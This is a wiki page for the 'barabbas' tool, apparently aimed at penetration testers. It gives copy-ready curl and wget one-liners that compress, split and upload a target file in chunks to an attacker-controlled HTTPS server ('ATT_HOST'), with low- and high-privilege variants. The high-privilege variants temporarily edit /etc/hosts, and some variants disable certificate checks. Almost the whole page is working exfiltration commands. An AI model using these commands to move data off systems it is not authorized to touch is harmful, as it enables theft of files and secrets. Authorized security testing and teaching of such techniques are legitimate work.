UL_ _Lin_ _Special_Cases - lighthouseitsecurity/barabbas GitHub Wiki

File Upload ➔ Linux ➔ Special Cases


curl - large file upload

  • Overview:
    • encountered not that often, across various distributions, by default
      • popular/widely-used tool - often additionally installed
    • for X.509 certificate validation to work, its Common Name field must contain one of the following:
      • a locally DNS-resolvable hostname/FQDN
        • solved, by modifying the hosts file (requires local administrative privileges)
      • the IP address of the listening network interface (that is being accessed)
        • does not require local administrative privileges
    • works good/reliable
    • decent speed (slower, compared to wget)

[HIGH PRIV] HTTPS + password authentication + check certificate (CN = hostname)

TESTED ON: Kali 2023.2

0. [CLIENT] confirm prerequisites

tools=("openssl" "grep" "tr" "cut" "sed" "tar" "split" "ls" "curl" "md5sum" "rm"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;

1. [SERVER] setup web server

sudo su
barabbas -i -a -up testuser:testpass -cn testhost

2. [CLIENT] open terminal session

(open terminal window with local administrative privileges)

3. [CLIENT] specify file transfer parameters

export ATT_HOST=;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";

NOTE: copy target file to current directory

4. [CLIENT] upload file

echo '[*] STARTING FILE UPLOAD'; echo | openssl s_client -connect $ATT_HOST:$ATT_PORT |& openssl x509 -out /tmp/cert.crt; openssl x509 -fingerprint -sha256 -in /tmp/cert.crt -noout; x509_info=$(openssl x509 -in /tmp/cert.crt -text | grep "Issuer:" -A4); echo "$x509_info"; ATT_HOSTNAME=$(echo "$x509_info" | grep "Issuer:" | tr -d " " | cut -d "=" -f7); ATT_URL="https://$ATT_HOSTNAME:$ATT_PORT$ATT_PATH"; hosts_entry=$ATT_HOST' '$ATT_HOSTNAME; sed -i '$a\'"${hosts_entry}"'' /etc/hosts; tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do curl -s --ssl --cacert /tmp/cert.crt -u $ATT_USER:$ATT_PASS -F "file=@"$compr_file_chunk $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1)"; echo; rm $compr_file_chunk; done; sed -i -z 's/'"${hosts_entry}\n"'//g' /etc/hosts; rm /tmp/cert.crt; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";

5. [SERVER] assemble target file

export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;

[LOW PRIV] HTTPS + password authentication + check certificate (CN = IP address)

TESTED ON: Kali 2023.2

0. [CLIENT] confirm prerequisites

tools=("openssl" "grep" "tar" "split" "ls" "curl" "md5sum" "rm"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;

1. [SERVER] setup web server

sudo su
barabbas -i -a -up testuser:testpass -cn

2. [CLIENT] open terminal session

(open terminal window)

3. [CLIENT] specify file transfer parameters

export ATT_HOST=;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";

NOTE: copy target file to current directory

4. [CLIENT] upload file

echo '[*] STARTING FILE UPLOAD'; ATT_URL="https://$ATT_HOST:$ATT_PORT$ATT_PATH"; echo | openssl s_client -connect $ATT_HOST:$ATT_PORT |& openssl x509 -out /tmp/cert.crt; openssl x509 -fingerprint -sha256 -in /tmp/cert.crt -noout; x509_info=$(openssl x509 -in /tmp/cert.crt -text | grep "Issuer:" -A4); echo "$x509_info"; tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do curl -s --ssl --cacert /tmp/cert.crt -u $ATT_USER:$ATT_PASS -F "file=@"$compr_file_chunk $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1)"; echo; rm $compr_file_chunk; done; rm /tmp/cert.crt; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";

5. [SERVER] assemble target file

export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;

[LOW PRIV] HTTPS + password authentication + no check certificate

TESTED ON: Kali 2023.2

0. [CLIENT] confirm prerequisites

tools=("tar" "split" "ls" "curl" "grep" "md5sum" "rm"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;

1. [SERVER] setup web server

sudo su
barabbas -i -a -up testuser:testpass -cn testhost

2. [CLIENT] open terminal session

(open terminal window)

3. [CLIENT] specify file transfer parameters

export ATT_HOST=;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";

NOTE: copy target file to current directory

4. [CLIENT] upload file

echo '[*] STARTING FILE UPLOAD'; ATT_URL="https://$ATT_HOST:$ATT_PORT$ATT_PATH"; tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do curl -s --ssl -k -u $ATT_USER:$ATT_PASS -F "file=@"$compr_file_chunk $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1))"; echo; rm $compr_file_chunk; done; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";

5. [SERVER] assemble target file

export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;

wget - large file upload

  • Overview:
    • encountered very often, across various distributions, by default
    • at the time of writing, does not support POST-ing data using multipart/form-data
      • existing options for file upload (--post-file, --body-file) use unsupported upload technique (application/x-www-form-urlencoded)
      • solved, by manually constructing the POST request body and adding required HTTP request headers
    • for X.509 certificate validation to work, its Common Name field must contain a locally DNS-resolvable hostname/FQDN
      • solved, by modifying the hosts file (requires local administrative privileges)
    • works good/reliable
      • specifying credentials via readily available arguments resulted with occasional errors, as observed during testing
        • workaround - manually add HTTP Authorization request header
    • fast

[HIGH PRIV] HTTPS + password authentication + check certificate

TESTED ON: Kali 2023.2

0. [CLIENT] confirm prerequisites

tools=("openssl" "grep" "tr" "cut" "sed" "head" "tar" "split" "ls" "cat" "wget" "rm" "md5sum"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;

1. [SERVER] setup web server

sudo su
barabbas -i -a -up testuser:testpass -cn testhost

2. [CLIENT] open terminal session

(open terminal window with local administrative privileges)

3. [CLIENT] specify file transfer parameters

export ATT_HOST=;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";

NOTE: copy target file to current directory

4. [CLIENT] upload file

echo '[*] STARTING FILE UPLOAD'; echo | openssl s_client -connect $ATT_HOST:$ATT_PORT |& openssl x509 -out /tmp/cert.crt; openssl x509 -fingerprint -sha256 -in /tmp/cert.crt -noout; x509_info=$(openssl x509 -in /tmp/cert.crt -text | grep "Issuer:" -A4); echo "$x509_info"; ATT_HOSTNAME=$(echo "$x509_info" | grep "Issuer:" | tr -d " " | cut -d "=" -f7); ATT_URL="https://$ATT_HOSTNAME:$ATT_PORT$ATT_PATH"; hosts_entry=$ATT_HOST' '$ATT_HOSTNAME; sed -i '$a\'"${hosts_entry}"'' /etc/hosts; marker=$(tr -dc a-f0-9 </dev/urandom | head -c 32); tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do echo -e '--------------------------'$marker'\nContent-Disposition: form-data; name="file"; filename="'$compr_file_chunk'"\nContent-Type: application/octet-stream\n' > /tmp/temp_file_wget; cat $compr_file_chunk >> /tmp/temp_file_wget; echo -e "\n--------------------------$marker--" >> /tmp/temp_file_wget; wget -qO- --ca-certificate="/tmp/cert.crt" --header="Content-type: multipart/form-data boundary=$marker" --header="Authorization: Basic "$(echo -n $ATT_USER:$ATT_PASS | base64) --post-file /tmp/temp_file_wget $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; rm /tmp/temp_file_wget; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1)"; echo; rm $compr_file_chunk; done; sed -i -z 's/'"${hosts_entry}\n"'//g' /etc/hosts; rm /tmp/cert.crt; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";

5. [SERVER] assemble target file

export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;

[LOW PRIV] HTTPS + password authentication + no check certificate

TESTED ON: Kali 2023.2

0. [CLIENT] confirm prerequisites

tools=("grep" "tr" "head" "tar" "split" "ls" "cat" "wget" "rm" "md5sum"); for tool in ${tools[@]}; do echo "[*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;

1. [SERVER] setup web server

sudo su
barabbas -i -a -up testuser:testpass -cn testhost

2. [CLIENT] open terminal session

(open terminal window)

3. [CLIENT] specify file transfer parameters

export ATT_HOST=;
export ATT_PORT=443;
export ATT_USER="testuser";
export ATT_PASS="testpass";
export ATT_PATH=/;
export LFILE="testfile_200MB";

NOTE: copy target file to current directory

4. [CLIENT] upload file

echo '[*] STARTING FILE UPLOAD'; ATT_URL="https://$ATT_HOST:$ATT_PORT$ATT_PATH"; marker=$(tr -dc a-f0-9 </dev/urandom | head -c 32); tar -cvzf $LFILE.tar.gz $LFILE > /dev/null; split -b 50M $LFILE.tar.gz "$LFILE.tar.gz.part"; echo; for compr_file_chunk in $(ls -1 $LFILE.tar.gz.part*); do echo -e '--------------------------'$marker'\nContent-Disposition: form-data; name="file"; filename="'$compr_file_chunk'"\nContent-Type: application/octet-stream\n' > /tmp/temp_file_wget; cat $compr_file_chunk >> /tmp/temp_file_wget; echo -e "\n--------------------------$marker--" >> /tmp/temp_file_wget; wget -qO- --no-check-certificate --header="Content-type: multipart/form-data boundary=$marker" --header="Authorization: Basic "$(echo -n $ATT_USER:$ATT_PASS | base64) --post-file /tmp/temp_file_wget $ATT_URL | grep -Eo 'FILE UPLOADED: .*)'; rm /tmp/temp_file_wget; echo "[*] LOCAL MD5: $(md5sum $compr_file_chunk | cut -d ' ' -f1)"; echo; rm $compr_file_chunk; done; rm $LFILE.tar.gz; echo "[*] LOCAL MD5 (CLIENT): $(md5sum $LFILE)";

5. [SERVER] assemble target file

export LFILE="testfile_200MB";
touch $LFILE.tar.gz; for chunk in $(ls -1 $LFILE.tar.gz.part*); do cat $chunk >> $LFILE.tar.gz; done; tar -xvf $LFILE.tar.gz > /dev/null; echo "[*] LOCAL MD5 (SERVER): $(md5sum $LFILE)"; rm $LFILE.tar.gz; rm $LFILE.tar.gz.part*;
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